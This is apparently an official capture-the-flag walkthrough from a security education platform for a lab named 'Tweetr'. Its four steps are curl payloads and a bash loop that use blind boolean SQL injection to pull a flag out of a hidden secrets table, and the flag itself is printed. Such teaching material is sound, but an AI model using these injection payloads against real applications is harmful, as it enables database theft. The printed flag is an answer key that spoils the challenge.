HACKR.GG
hackr.gg — Tweetr Walkthrough
hackr.gg — Official Walkthrough
Confidential · Educational Use Only

Tweetr

SQL Injection · Blind Boolean SQL Injection
Difficulty
Medium
Vuln class
Blind Boolean SQL Injection
Steps
4
// Objective
Extract the flag from the hidden secrets table using blind boolean SQL injection against a username-check endpoint that returns only true or false.
// Tools required
curlbash
// Step-by-step walkthrough
1
Confirm the injection point
The /api/check endpoint accepts a username and returns {"found":true} or {"found":false}. Test for injection by sending a tautology and a contradiction.
Command / Input
curl -s -X POST http://localhost:$PORT/api/check -H 'Content-Type: application/json' -d '{"username":"admin\' AND 1=1--"}' curl -s -X POST http://localhost:$PORT/api/check -H 'Content-Type: application/json' -d '{"username":"admin\' AND 1=2--"}'
Output
{"found":true} {"found":false}
Different responses confirm the injection. The boolean logic is being evaluated by the database.
2
Confirm the secrets table exists
Ask the database whether the secrets table has any rows.
Command / Input
curl -s -X POST http://localhost:$PORT/api/check -H 'Content-Type: application/json' -d '{"username":"\' OR (SELECT count(*) FROM secrets)>0--"}'
Output
{"found":true}
3
Find the flag length
Binary search on the flag length. Try values until the response flips from true to false.
Command / Input
curl -s -X POST http://localhost:$PORT/api/check -H 'Content-Type: application/json' -d '{"username":"\' OR length((SELECT flag FROM secrets LIMIT 1))>30--"}'
Adjust the number until you narrow down the exact length.
4
Extract each character with binary search
Use ascii(substr(...)) to binary search each character position. Automate with a bash loop.
Command / Input
for pos in $(seq 1 38); do for val in $(seq 32 126); do r=$(curl -s -X POST http://localhost:$PORT/api/check \ -H 'Content-Type: application/json' \ -d "{\"username\":\"' OR ascii(substr((SELECT flag FROM secrets LIMIT 1),$pos,1))=$val--\"}") if echo "$r" | grep -q 'true'; then printf "\\$(printf '%03o' $val)" break fi done done
Output
HackrGG{bl1nd_sqli_tw33tr_3xtr4ct3d}
// Flag
Flag value
HackrGG{bl1nd_sqli_tw33tr_3xtr4ct3d}
Extracted character by character from the secrets table using blind boolean injection.
hackr.gg · Cybersecurity Education PlatformEducational use only · Do not distribute